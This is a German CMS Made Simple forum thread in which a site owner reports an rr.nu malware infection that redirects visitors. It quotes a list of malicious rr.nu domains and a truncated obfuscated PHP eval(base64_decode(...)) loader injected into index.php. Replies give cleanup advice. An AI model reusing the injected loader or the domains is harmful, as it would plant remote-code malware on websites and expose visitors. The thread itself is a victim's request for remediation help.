Du bist nicht angemeldet. Der Zugriff auf einige Boards wurde daher deaktiviert.
Seiten: 1
#1 18. März 2012 14:02
- martin1660
- probiert CMS/ms aus
- Registriert: 03. Juli 2011
- Beiträge: 21
rr.nu Virus/Maleware
Hallo,
seit etwa 4 Wochen kommt es auf meiner Website (mit CMSMS 1.9.4.2 "Faanui") zu folgendem Phänomen:
Immer Mittwochs wird die Seite nicht mehr korrekt angezeigt, sondern nur noch bruchstückhaft, als wäre das Stylesheet nicht vorhanden. Es erscheint dann die Meldung "Unable to load/reach cache".
Website-Besucher haben auch schon darüber berichtet, statt die Seite zu erreichen, auf Pornoseiten weitergeleitet zu werden.
Im CMSMS-Verzeichnis auf dem Webserver gibt es ein Verzeichnis namens ".LOGS", welche wiederum eine Datei namens "log1" enthält, in der Einträge wie
urnsa04ndini.rr.nu/
ays86heye.rr.nu/
sha29yess.rr.nu/
penden19tagess.rr.nu/
tingu09ishpla.rr.nu/
usinge04ntrykn.rr.nu/
germa77nitsel.rr.nu/
stehen.
Auch die index.php hat am Anfang merkwürdige Einträge
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICBmdW5jdGlvbiBnZXRfdGRzXzc3NygkdXJsKXskY29udGVudD0iIjskY29udGVudD1AdHJ5Y3VybF83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZpbGVfNzc3KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICR [gekürzt]
Es scheint also ein Virus wie hier beschrieben http://www.spkaa.com/3-step-fix-for-you … s-outbreak vorzuliegen, ein rr.nu-Virus.
Ich werde jetzt ein Backup der Daten und der Datenbank von vor 6 Wochen aufspielen und alle Passwörter ändern.
Die Frage jedoch ist: reicht das und wie kam/kommt es zu der Infektion?
Vielen Dank für etwaige Anregungen!
Offline
#2 18. März 2012 17:17
- Klenkes
- Server-Pate
- Ort: 89428 Syrgenstein
- Registriert: 17. Dezember 2010
- Beiträge: 1.437
Re: rr.nu Virus/Maleware
Rücksicherung des alten Standes löst, wie du ja weist, das Problem nicht.
1.9.4.2 hatte ein Problem mit News. Also auf jeden Fall updaten!
Passwörter(auch FTP) ändern und die beiden Stickyberichte in diesem Form lesen.
Offline
#3 18. März 2012 20:58
- nockenfell
- Moderator
- Ort: Gontenschwil, Schweiz
- Registriert: 09. November 2010
- Beiträge: 2.934
- Webseite
Re: rr.nu Virus/Maleware
Du kannst nach dieser Anleitung von mir vorgehen:
[dieser Beitrag wurde mit 100% recycled bits geschrieben]
Mein Blog / Diverse Links rund um CMS Made Simple
Module: btAdminer, ToolBox
Offline
Seiten: 1